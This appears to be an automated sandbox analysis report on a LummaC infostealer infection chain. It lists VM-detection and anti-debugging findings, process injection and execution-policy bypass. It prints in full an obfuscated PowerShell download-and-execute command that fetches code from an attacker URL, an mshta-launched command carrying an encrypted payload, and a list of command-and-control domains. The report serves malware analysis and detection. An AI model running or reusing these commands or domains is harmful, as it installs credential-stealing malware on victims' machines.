Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_06BE9635 rdtsc

4_2_06BE9635

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3916	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 949	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4300	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5432	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2201	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5356	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3844	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4812	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6164	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5808	Thread sleep count: 2201 > 30	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: mshta.exe, 00000000.00000002.1727175203.0000000003099000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000009.00000002.2885773089.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.2456406538.0000000007088000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

API call chain: ExitProcess graph end node

graph_9-13471

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BE9635 Start: 06BE9652 End: 06BE9659	4_2_06BE9635
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BE962D Start: 06BE9652 End: 06BE9659	4_2_06BE962D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BE9645 Start: 06BE9659 End: 06BE9652	4_2_06BE9645
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06BE95E5 Start: 06BE9652 End: 06BE9659	4_2_06BE95E5

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_06BE9635 rdtsc

4_2_06BE9635

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 9_2_0043BAD0 LdrInitializeThunk,

9_2_0043BAD0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: powershell.exe	String found in binary or memory: hummskitnj.buzz
Source: powershell.exe	String found in binary or memory: cashfuzysao.buzz
Source: powershell.exe	String found in binary or memory: appliacnesot.buzz
Source: powershell.exe	String found in binary or memory: screwamusresz.buzz
Source: powershell.exe	String found in binary or memory: inherineau.buzz
Source: powershell.exe	String found in binary or memory: scentniej.buzz
Source: powershell.exe	String found in binary or memory: rebuildeso.buzz
Source: powershell.exe	String found in binary or memory: prisonyfork.buzz
Source: powershell.exe	String found in binary or memory: noisercluch.click

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name)\|Member\|Where-Object{$_.Name-like'tomd'}).Name).Invoke($ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name).PsObject.Methods\|Where-Object{$_.Name-like'ome'}).Name).Invoke('N-O',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value\|Member)\|Where-Object{$_.Name-like'nlg'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kowp($wfbpy){return -split ($wfbpy -replace '..', '0x$& ')};$mbfyr = kowp('9e334b36da65fc4cd88fd0d54c1c22fbf8dc3b04bea415ee8d3a4d1484b0406150b7ff1c184327b495dc49163e68ae0670ba32d22b53f3d21dccdda39fd3253fed91de2b3f77e4037b055f4b3412d5ccdc3a1b39789f06f7930dc4a07956fa68eca8e2f6499d93177d1921ae2418cb2699ec6c80e7279a8abd6a9a4d7e3fe3e8dbe4570e1f55a43d6d4c508fa56991f95689680af64b5262a41d3d94c5f57cfa20aeb1a08ff2bf17b5dacb4212c70dab809fdb5cbe0fb22347ae8ac80dfc19be9c5ba8e9936657f3587dc5a7c1b93b8b5b8928d6f42dffa7e01fdf4e34c895c6039aa5aad3d62f3554cf79ffd5e8d7a01a4ee09aff55f72c99249d32b683a307373ee57bf7dabb7b643375c84a3675780a53350109bb137cd9b3151e1862197a092a63d6891d60c45b0e08870aca193a7ae7a69f71d5319d1c5591c30f1eb14bf2e8cac0c0aa47b1cf263341221208edd70adc782580aef182c6ede0ac0c8846ba02132ccc59fe2fba0af85cc83a92b444e34d299ce4bb78d2e67097531997b9c398afa59a05087ad10cb8fccd64b089cb7e1d9448a06e5451b7e1fad3cd11656ce7d71529fc0aeeec74a57c9b8ada400e5bb14d609b2a4d2c9887a949a351792f6daad814bcef8c2537ea18295dbf31bebe4d1bfa7bbe02dadaccfc47444eb2b533f4a699b7865c05848bb784791abdba2f36a897be319943b5c85f80d1b9901f0ffc37613068553b99ee84836a56cb1f70957317e3a43f3d9ebbbe18feeee52ce041029ab9ae45a4c86f910a6ddf5765b4bdb03cb85481ddc8c8212a1f1f92b468be8cb5336e24ed88c9ec8a01cd4f72de404497dbb43a1c6a3822034f15f5f613ef5ad780b9692707bab44fb088a6061592c44b022a6d2a450c99c283117c8de80e765c31e70308152e59458e6fd3a65543c1ec931ac1a324732f6d1faac4abd5f572332947d1cb4967831073016e5efaef616f9317b004a73fffa3bb2982e91cbdec269fef3ef96395f94be96d5496bdf35e25a6638e2e25097db07c73c3edd7402bed8fc500882da3aaffc8d06fd1bdde8708df8df844f0ddceccaa22d16bab70d3b7d5e264b1ae1584137dd7bda7005c6f39d6c9271a903bb3663e0edf514bf4a8d05593db9b5ddfc4556bac017ae2de8428ea44a76d6e9afc522c9004ed9c593141666a52943ad448960d2c7623e6c4af33f5bad89705b716c876ae63e40d381b88ebeeb6363614481cfb2012acabc9c09e6d61b30149f2e4fa7380a70464224bec1abe9475dbd5b97fcf0278165f21fb815ff60146030497a1ac45d69ca7553003c733f00f0973a5fd787f2e4dec6f22a0bd2b2f6f882afafcfc5c903fb6aaedd7f994e291239b6b7d06cf6df234fb061934125997ffac95d4511365a41a1a1a2b19410abb92ee5511d9acb16adbbcfe5b0c2a4cf6c8b8cd6f6e0e9fdf7232373370c3cb4477d9d543073daf28d5809ad15346e15e3e789993ef8d9b807067bf4f550783802415488f744831f04feef6925abc1b6b107b1002ff450b386d584c659f07eb9483654ca1f5116547b9383d4f85cd91ce2d9f6088d2ce491512578016e54a41fae48b2708f2ab1fa5c98f21304571169f6900a36e6ab306adb4533f862332fe99dca4cc3c773200966c0661e34a4320c65cf06429fcf2c90f24ece6ed646948a6b8ccc0b81784faffc3007767bbc247c0a4fd247054540d44a8f8f303c529528c742475550e80ff0a5ce818cf6a23675e50f990211be6a6dc6d729cc913740aee1a9cde15b4f8d33d82ca43b137e9b62f21e5fc4638a978553bec16e68b51442628a7b1b7cd74d29750eea98b02dce0dc70288eaa41730bdd489c393e565891b9e2c52fe9e6a9704f6ff74b93abf9307ea0d851bcdf290e0a8461d19516abb02c61c6cbe1e1c259');$ajig=-join [char[]](([security.cryptography.aes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command gdr -;set-variable ciu (.$executioncontext.(($executioncontext\|member)[6].name).(($executioncontext.(($executioncontext\|member)[6].name)\|member\|where-object{$_.name-like'tomd'}).name).invoke($executioncontext.(($executioncontext\|member)[6].name).(($executioncontext.(($executioncontext\|member)[6].name).psobject.methods\|where-object{$_.name-like'ome'}).name).invoke('n-o',$true,$true),[management.automation.commandtypes]::cmdlet)net.webclient);set-item variable:/lw 'https://cc.klipjaqemiu.shop/web.png';[scriptblock]::create((gi variable:ciu).value.((((gi variable:ciu).value\|member)\|where-object{$_.name-like'nlg'}).name).invoke((variable lw).value)).invokereturnasis()
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function kowp($wfbpy){return -split ($wfbpy -replace '..', '0x$& ')};$mbfyr = 